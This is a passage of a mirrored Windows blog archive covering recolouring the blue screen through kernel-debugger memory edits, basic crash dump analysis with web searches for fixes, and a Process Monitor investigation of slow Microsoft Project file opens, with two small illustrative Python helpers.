target="_blank"> bugcheck callback </A> ”. When the system crashes it invokes driver-registered callbacks so that they can add data to the crash dump that can help troubleshooters get information about device or driver state at the time of a crash. 
The Myfault.sys callback executes just after the blue screen paints and switches the colors to the ones Notmyfault passed to it by changing the default VGA palette entries used by the Boot Video driver. </P> <P> Now with no awkward and error-prone fiddling in a kernel debugger, you can impress your friends and family with a blue screen painted in your favorite colors (though they might be even more impressed if you change the colors by fiddling in the kernel debugger)! </P> <P> To download the latest copy of Notmyfault (both 32-bit and 64-bit versions) click <A href="#" target="_blank"> here </A> . </P> </BODY></HTML> Thu, 27 Jun 2019 07:09:37 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/8220-blue-screens-8221-in-designer-colors-with-one-click/ba-p/723977 MarkRussinovich 2019-06-27T07:09:37Z A Bluescreen By Any Other Color https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/a-bluescreen-by-any-other-color/ba-p/723974 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Dec 13, 2010 </STRONG> <BR /> <P> Note: for an easier way to customize the blue screen’s colors, see my next blog post, “ <A href="#" target="_blank"> Blue Screens in Designer Colors with One Click </A> ”. </P> <P> Seeing a bluescreen that’s not blue is disconcerting, even for me, and based on the reaction of the TechEd audiences, I bet you’ll have fun generating ones of a color you pick and showing them off to your techy friends. I first saw <A href="#" target="_blank"> Dan Pearson </A> do this in a crash dump troubleshooting talk he delivered with <A href="#" target="_blank"> Dave Solomon </A> a couple of years ago and now close my <A href="#" target="_blank"> Case of the Unexplained </A> presentations with a bluescreen of the color the audience chooses (you can hear the audience’s response at the end of <A href="#" target="_blank"> this recording </A> , for example). 
Note that the steps I’m going to share for changing the color of the bluescreen are manual and only survive a boot session, so they are suitable for demonstrations, not for general bluescreen customization. Be sure to check out the special holiday bluescreen I’ve prepared for you at the end of the post. </P> <H3> Preparing the System </H3> <P> Because you’re going to modify kernel code, the first step is to enable the ability to edit kernel code in memory if it’s not already enabled. Windows systems with less than 2 GB of RAM use 4 KB pages to store kernel code, so they can protect each page with the protection most suitable for its contents. For instance, kernel data pages should allow both read and write access while kernel code should only allow read and execute access. As an optimization that helps improve the speed of virtual address translations, Windows uses large pages (4 MB on x86 and x64) on larger systems. That means that if there’s both code and data stored in a page, the page must allow read, write and execute accesses, so to ensure that you can edit a page, you have to encourage Windows to use large pages. 
If your system is Windows XP or Server 2003 and has less than 256 MB of RAM, or is Windows Vista or higher and has 2 GB or less of RAM, create a REG_DWORD value called LargePageMinimum that’s set to 1 under HKLM\System\CurrentControlSet\Control\Session Manager\Memory Management: </P> <P> <IMG alt="image" border="0" height="263" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6622.image_5F00_thumb_5F00_300C2376.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121266i9FE582C0F7DE10D5" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="454" /> </P> <P> So that you don’t have to rush to show off your handiwork before Windows automatically reboots after the crash, change the auto-reboot setting. On Windows XP and Server 2003, right-click on My Computer, select Properties, select the Advanced tab, and press the Settings button in the “Startup and Recovery” section. On Windows Vista and higher, right-click on Computer in the Start Menu, select Properties to open the Properties dialog, click Advanced System Settings, select the Advanced tab and press the Settings button in the “Startup and Recovery” section. 
Finally, uncheck the “Automatically restart” checkbox: </P> <P> <IMG alt="SNAGHTML5fc0cb41_thumb2" border="0" height="296" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4578.SNAGHTML5fc0cb41_5F00_thumb2_5F00_thumb_5F00_081395A5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121267i8979053247E39DCC" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="SNAGHTML5fc0cb41_thumb2" width="354" /> </P> <P> If you’re running 64-bit Windows Vista or higher, you need to boot the system in Debug mode so that you can run the kernel debugger in “local” mode. You can do that either by selecting F8 during the system boot and choosing the Debug boot or by checking the Debug checkbox in the System Configuration (Msconfig) utility: </P> <P> <IMG alt="image_thumb31" border="0" height="196" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8304.image_5F00_thumb31_5F00_thumb_5F00_40BE3FB2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121268i3781007D6D454DE4" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image_thumb31" width="404" /> </P> <P> Next, reboot the system and start the debugger with administrator rights (if UAC is on, run it as administrator). 
Point the debugger at the Microsoft symbol server by opening the Symbol Search Path dialog under the File menu and enter this string: srv*c:\symbols*<A href="#" target="_blank">http://msdl.microsoft.com/download/symbols</A> (replace c:\symbols with whatever local directory in which you want the debugger to store cached symbols). Next, open the Kernel Debugging dialog from the File menu, click the Local page, and press OK: </P> <P> <IMG alt="image_thumb33" border="0" height="352" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4087.image_5F00_thumb33_5F00_thumb_5F00_27563C78.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121269i52D2D098DC333819" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image_thumb33" width="404" /> </P> <P> The subsequent steps vary depending on whether you’re running 32-bit or 64-bit Windows and whether it’s Windows Vista or newer. </P> <H3> 32-bit Windows XP and Windows Server 2003 </H3> <P> The function that displays the bluescreen on these operating systems is KeBugCheck2. You’re looking for the place where the function passes the color value to the function that fills the screen background, InbvSolidColorFill. Enter the command “u kebugcheck2” to list the start of the function, then enter the “u” command to dump additional pages of the function’s code until you see the reference to InbvSolidColorFill (after entering “u” once, you can just press enter to repeat the command). 
You’ll need to dump 30-40 pages before you come across the one with the call: </P> <P> <IMG alt="image" border="0" height="252" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4722.image_5F00_thumb_5F00_71D536E6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121270iB7C453EC3CE70335" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> Preceding the call, you’ll see an instruction that has the number 4 as its argument (“push 4”), as you can see above. Copy the code address of that instruction by selecting it from the address column on the left and typing Ctrl+C. Then in the debugger command window, type “eb “, then Ctrl+V to paste the address, then “+1”, then enter. The debugger will go into memory editing mode, starting with the address of the color value. Now you can choose the color you want. 1 is red, 2 is green, and you can experiment if you want a different color. Simply enter the number and press enter twice to commit it and exit editing mode. 
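</P> <P> The “+1” makes sense if the instruction is the two-byte x86 form of “push 4”: one opcode byte followed by a one-byte immediate that holds the color. That encoding (6A 04) is an assumption on my part based on the standard x86 instruction set, so check the bytes the debugger actually shows on your system. The Python sketch below applies the same one-byte change to an in-memory copy of those bytes; it does not touch kernel memory, and the helper name is made up. </P>

```python
def patch_immediate(code, offset, new_value):
    """Return a copy of code with the single byte at offset replaced."""
    patched = bytearray(code)
    patched[offset] = new_value
    return bytes(patched)


# Assumed encoding of x86 "push 4": opcode 0x6A, then an 8-bit immediate.
PUSH_4 = bytes([0x6A, 0x04])

# Equivalent in spirit to "eb <address>+1" followed by entering 1 (red).
red = patch_immediate(PUSH_4, 1, 0x01)
print(red.hex())
```

<P>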
Here’s what the debugger window should look like after you’re done: </P> <P> <IMG alt="image_thumb38" border="0" height="213" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8228.image_5F00_thumb38_5F00_thumb_5F00_02D964CA.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121271i51C96D640474F5DB" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image_thumb38" width="550" /> </P> <H3> 64-bit Versions of Windows and 32-bit Windows Vista and Higher </H3> <P> On these versions of Windows, the core bluescreen drawing function is KiDisplayBlueScreen. Type “u kidisplaybluescreen” and then continue entering “u” commands to dump pages of the function until you see the call to InbvSolidColorFill. On 32-bit versions of Windows, continue by following the instructions given in the Windows XP/Server 2003 section to find and edit the color value. On 64-bit versions of these operating systems, the instruction preceding the call to InbvSolidColorFill is the one that passes the color, so copy its address (the number in the left column) and enter this command to edit it: “eb &lt;address&gt;+4”. The debugger will go into memory editing mode and you can change the value (e.g. 
1 for red, 2 for green): </P> <P> <IMG alt="image_thumb42" border="0" height="213" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2350.image_5F00_thumb42_5F00_thumb_5F00_28CF1520.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121272i0003B69134F84A5C" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image_thumb42" width="550" /> </P> <H3> Viewing the Result </H3> <P> You’re now ready to crash the system. If you’re running 64-bit Windows, you might get a crash without doing anything additional. That’s because <A href="#" target="_blank"> Kernel Patch Protection </A> will notice the modification and crash the system as a deterrent to ISVs that might consider modifying the kernel’s code to change its behavior. There might be a delay of up to several minutes before that happens, though. 
To generate a crash on demand, run the Notmyfault tool (you can download it from the Windows Internals <A href="#" target="_blank"> book page </A> ) and press the “Do Bug” button (to avoid data loss, make sure you’ve saved any work and closed all other applications): </P> <P> <IMG alt="image_thumb45" border="0" height="365" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/7120.image_5F00_thumb45_5F00_thumb_5F00_4CDFB9D9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121273iCF3EDAB74C0B896E" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image_thumb45" width="204" /> </P> <P> You’ll now get a bluescreen in the color you picked, in this case the red screen of death: </P> <P> <IMG alt="image_thumb47" border="0" height="413" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/7462.image_5F00_thumb47_5F00_thumb_5F00_5577CEF9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121274iB47C7FB058479DBB" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image_thumb47" width="550" /> </P> <H3> The Holiday Bluescreen </H3> <P> In the spirit of the holiday season, I took things one step further to generate a holiday-themed bluescreen: not only did I modify the background color, but the text color as well. 
To do this on 64-bit versions of Windows Vista or higher, note the call to InbvSetTextColor immediately following the one to InbvSolidColorFill and the address of the instruction that passes the text color to the function, “mov ecx, 0Fh”: </P> <P> <IMG alt="image" border="0" height="215" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0537.image_5F00_thumb_5F00_660FC9E7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121276i15F41B8B68BC4CB6" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> The 0Fh parameter represents white, but you can change it using the same editing technique. Use the “eb” command, passing the address of the instruction plus 1. Here I set the color to red (which is a value of 1): </P> <P> <IMG alt="image" border="0" height="75" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1780.image_5F00_thumb_5F00_4BCF60C3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121277iFFC9CFB2306EEDB0" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="279" /> </P> <P> And here’s the festive bluescreen I produced: </P> <P> <IMG alt="image" border="0" height="416" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8535.image_5F00_thumb_5F00_63F2CB1E.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121278iBFD86D3383F8DB7F" style="background-image: none; 
border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> Happy holidays! And remember, if you have any troubleshooting cases you want to share, please send me screenshots (.PNG preferred) and log files. </P> </BODY></HTML> Thu, 27 Jun 2019 07:09:20 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/a-bluescreen-by-any-other-color/ba-p/723974 MarkRussinovich 2019-06-27T07:09:20Z The Cases of the Blue Screens: Finding Clues in a Crash Dump and on the Web https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-cases-of-the-blue-screens-finding-clues-in-a-crash-dump-and/ba-p/723960 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Dec 12, 2010 </STRONG> <BR /> <P> <IMG align="right" alt="image" border="0" height="158" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8168.image_5F00_2BCD71AF.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121259iF9836063DF3CCDE9" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; float: right; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="100" /> My last <A href="#" target="_blank"> couple of posts </A> have looked at the lighter side of blue screens by showing you how to customize their colors. Windows kernel mode code reliability has gotten better and better every release such that many never experience the infamous BSOD. 
But if you have had one (one that you didn’t purposefully trigger with Notmyfault, that is), as I explain in my <A href="#" target="_blank"> Case of the Unexplained presentations </A> , spending a few minutes to investigate might save you the inconvenience and possible data loss caused by future occurrences of the same crash. In this post I first review the basics of crash dump analysis. In many cases, this simple analysis leads to a buggy driver for which there’s a newer version available on the Web, but sometimes the analysis is ambiguous. I’ll share two examples administrators sent me where a Web search with the right key words led them to a solution. </P> <P> Debugging a crash starts with downloading the Debugging Tools for Windows package (part of the <A href="#" target="_blank"> Windows SDK </A> – note that you can do a web install of just the Debugging Tools instead of downloading and installing the entire SDK), installing it, and configuring it to point at the Microsoft symbol server so that the debugger can download the symbols for the kernel, which are required for it to be able to interpret the dump information. 
You do that by opening the symbol configuration dialog under the File menu and entering the symbol server URL along with the name of a directory on your system where you’d like the debugger to cache symbol files it downloads: </P> <P> <IMG alt="image" border="0" height="295" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1031.image_5F00_thumb_5F00_7977FB6D.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121260i25E7444F50C41B97" style="background-image: none; border-bottom: 0px; border-left: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> The next step is loading the crash dump into the debugger using the Open Crash Dump entry in the File menu. Where Windows saves dump files depends on what version of Windows you’re running and whether it’s a client or server edition. There’s a simple rule of thumb you can follow that will lead you to the dump file regardless, though, and that’s to first check for a file named Memory.dmp in the %SystemRoot% directory (typically C:\Windows); if you don’t find it, look in the %SystemRoot%\Minidump directory and load the newest minidump file (assuming you want to debug the latest crash). </P> <P> When you load a dump file into the debugger, the debugger uses heuristics to try to determine the cause of the crash. It points you at the suspect by printing a line that says “Probably caused by:” with the name of the driver, Windows component, or type of hardware issue. 
Here’s an example that correctly identifies the problematic driver responsible for the crash, myfault.sys: </P> <P> <IMG alt="image" border="0" height="145" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8507.image_5F00_thumb_5F00_1E01EE09.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121261iEAB697066AED5075" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> In my talks, I also show you that clicking on the !analyze -v hyperlink will dump more information, including the kernel stack of the thread that was executing when the crash occurred. That’s often useful when the heuristics fail to pinpoint a cause, because you might see a reference to a third-party driver that, by being active around the site of the crash, might be the guilty party. Checking for a newer version of any third-party drivers displayed in this basic analysis often leads to a fix. I documented a troubleshooting case that followed this pattern in a previous blog post, <A href="#" target="_blank"> The Case of the Crashed Phone Call </A> . </P> <P> When you don’t find any clues, perform a Web search with the textual description of the crash code (reported by the !analyze -v command) and any key words that describe the machine or software you think might be involved. For example, one administrator was experiencing intermittent crashes across a Citrix server farm. He didn’t realize he could even look at a crash dump file until he saw a Case of the Unexplained presentation. 
After returning to his office from the conference, he opened dumps from several of the affected systems.&nbsp; Analysis of the dumps yielded the same generic conclusion in every case, that a driver had not released kernel memory related to remote user logons (sessions) when it was supposed to: </P> <P> <IMG alt="image" border="0" height="139" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1256.image_5F00_thumb_5F00_0FC37519.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121262iED827115415B987C" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> Hoping that a Web search might offer a hint and not having anything to lose, he entered “session_has_valid_pool_on_exit and citrix” in the browser search box. To his amazement, the very first result was a Citrix Knowledge Base fix for the exact problem he was seeing, and the article even displayed the same debugger output he was seeing: </P> <P> <IMG alt="image" border="0" height="290" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1050.image_5F00_thumb_5F00_2F724EE1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121263i2BC1FF91CC7515F9" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> After downloading and installing the fix, the server farm was crash-free. </P> <P> In another example, an administrator saw a server crash three times within several days. 
Unfortunately, the analysis didn’t point at a solution; it just seemed to say that the crash occurred because some internal watchdog timer hadn’t fired within some time limit: </P> <P> <IMG alt="image" border="0" height="275" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3618.image_5F00_thumb_5F00_6412AB1C.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121264i9C8F685109AB2F9E" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="429" /> </P> <P> As in the previous case, the administrator entered the crash text into the search engine and, to his relief, the very first hit announced a fix for the problem: </P> <P> <IMG alt="image" border="0" height="370" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6431.image_5F00_thumb_5F00_1CBD552A.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121265i64A63E2B0FD8E692" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="479" /> </P> <P> The server didn’t experience any more crashes after the listed hotfix was applied. </P> <P> These cases show that troubleshooting is really about finding clues that lead you to a solution or a workaround, and those clues might be obvious, might require a little digging, or might call for some creativity. In the end it doesn’t matter how or where you find the clues, so long as you find a solution to your problem. 
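</P> <P> The rule of thumb for locating the dump file described earlier in this post can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the function name find_crash_dump is hypothetical, minidumps are assumed to carry a .dmp extension, and both spellings of the minidump directory name are checked. </P>

```python
import os
from pathlib import Path


def find_crash_dump(system_root=None):
    """Return the dump file to load, or None if no dump is found.

    Hypothetical helper: checks Memory.dmp first, then falls back to
    the most recently modified minidump.
    """
    root = Path(system_root or os.environ.get("SystemRoot", r"C:\Windows"))

    # First choice: Memory.dmp directly under %SystemRoot%.
    memory_dump = root / "Memory.dmp"
    if memory_dump.is_file():
        return memory_dump

    # Fallback: the newest minidump. Both directory spellings are
    # checked (assumption of this sketch); missing ones are skipped.
    candidates = []
    for name in ("Minidump", "Minidumps"):
        directory = root / name
        if directory.is_dir():
            candidates.extend(directory.glob("*.dmp"))
    if not candidates:
        return None
    return max(candidates, key=lambda path: path.stat().st_mtime)
```

<P> Calling find_crash_dump() with no argument uses the SystemRoot environment variable; the returned path is the file you would hand to the debugger’s Open Crash Dump entry. 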
</P> </BODY></HTML> Thu, 27 Jun 2019 07:07:57 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-cases-of-the-blue-screens-finding-clues-in-a-crash-dump-and/ba-p/723960 MarkRussinovich 2019-06-27T07:07:57Z The Case of the Slow Project File Opens https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-slow-project-file-opens/ba-p/723952 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Dec 06, 2010 </STRONG> <BR /> <P> If you’ve seen one of my Case of the Unexplained presentations (like the one I delivered at TechEd Europe last month that’s posted for <A href="#" target="_blank"> on-demand viewing </A> ), you know that I emphasize how thread stacks are a powerful troubleshooting tool for diagnosing the root cause of performance problems, buggy behavior, crashes and hangs (I provide a brief explanation of what a stack is in the TechEd presentation). That’s because often times the explanation for a process’s behavior lies in the code it loads, either explicitly like in the case of DLLs it depends on, or implicitly like for processes that host extensions. This case is another demonstration of successful stack troubleshooting. It also shows how a little time troubleshooting to get a couple of clues can quickly lead to a solution. 
</P> <P> The case opened when the customer, a network administrator, contacted Microsoft support because a user reported that Microsoft Project files located on a network share were taking up to a minute to open and that about 1 in 10 opens resulted in an error: </P> <P> <IMG alt="image" border="0" height="147" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3704.image_5F00_thumb_5F00_0D203821.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121250iE90D8AEE193B3ED1" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="384" /> </P> <P> The administrator verified the issue, checked networking settings and latency to the file server, but could not find anything that would explain the problem. The Microsoft support engineer assigned to the case asked the administrator to capture <A href="#" target="_blank"> Process Monitor </A> and Network Monitor traces of a slow file open. After receiving the logs a short time later, he opened the Process Monitor log and set a filter to include only operations issued by the Project process and then another filter to include paths that referenced the target file share, \\DBG.ADS.COM\LON-USERS-U. 
The File Summary dialog, which he opened from Process Monitor’s Tools menu, showed significant time spent in file operations accessing files on the share, shown in the File Time column: </P> <P> <IMG alt="image" border="0" height="174" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2337.image_5F00_thumb_5F00_005354D4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121251i2CA98503F43227FA" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> The paths in the trace revealed that the user profiles were stored on the file server and that the launch of Project caused heavy access of the profile’s AppData subdirectory. If many users had their profiles stored on the same server via folder redirection and were running similar applications that stored data in AppData, that would surely account for at least some of the delays the user was experiencing. It’s well known that redirecting the AppData directory can result in performance problems, so based on this, the support engineer arrived at his first recommendation: for the company to configure their roaming user profiles to not redirect AppData and to sync the AppData directory only at logon and logoff as per the guidance found in this Microsoft <A href="#" target="_blank"> blog post </A> : </P> <BLOCKQUOTE> <P> <EM> Special considerations for AppData\Roaming folder: <BR /> If the AppData folder is redirected, some applications may experience performance issues because they will be accessing this folder over the network. 
If that is the case, it is recommended that you configure the following Group Policy setting to sync the AppData\Roaming folder only at logon and logoff and use the local cache while the user is logged on. While this may have an impact on logon/logoff speeds, the user experience may be better since applications will not freeze due to network latency. </EM> </P> <P> <EM> User configuration&gt;Administrative Templates&gt;System&gt;User Profiles&gt;Network directories to sync at Logon/Logoff. </EM> </P> <P> <EM> If applications continue to experience issues, you should consider excluding AppData from Folder Redirection – the downside of doing so is that it may increase your logon/logoff time. </EM> </P> </BLOCKQUOTE> <P> Next, the engineer examined the trace to see if Project was responsible for all the traffic to files like Global.MPT, or if an add-in was responsible. This is where the stack trace was indispensable. After setting a filter to show just accesses to Global.MPT, the file that accounted for most of the I/O time as shown by the summary dialog, he noticed that it was opened and read multiple times. 
First, he saw 5 or 6 long runs of small random reads: </P> <P> <IMG alt="image" border="0" height="334" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/7450.image_5F00_thumb_5F00_7A26B405.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121252i05C92BAC8D77078B" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="484" /> </P> <P> The stacks for these operations showed that Project itself was responsible, however: </P> <P> <IMG alt="image" border="0" height="414" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3617.image_5F00_thumb_5F00_37F89C33.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121253i17182087A10E39CC" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="334" /> </P> <P> He also saw sequences of large, non-cached reads. 
The small reads he looked at first were cached, so there would be no network access after the first read caused the data to cache locally, but non-cached reads would go to the server every time, making them much more likely to impact performance: </P> <P> <IMG alt="image" border="0" height="286" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4810.image_5F00_thumb_5F00_785BB271.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121254i20AC430DC1A110FC" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> To make matters worse, he saw this sequence six times in the trace, which you can see with a filter set to just show the initial read of each sequence: </P> <P> <IMG alt="image" border="0" height="91" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/7140.image_5F00_thumb_5F00_05C1C578.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121255i5A9975C7A174535D" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> The stacks for these reads revealed them to be the result of a third-party driver, which was visible by the fact that the stack trace dialog, which he’d configured to obtain symbols from Microsoft’s public symbol servers, showed no symbol information: </P> <P> <IMG alt="image" border="0" height="342" 
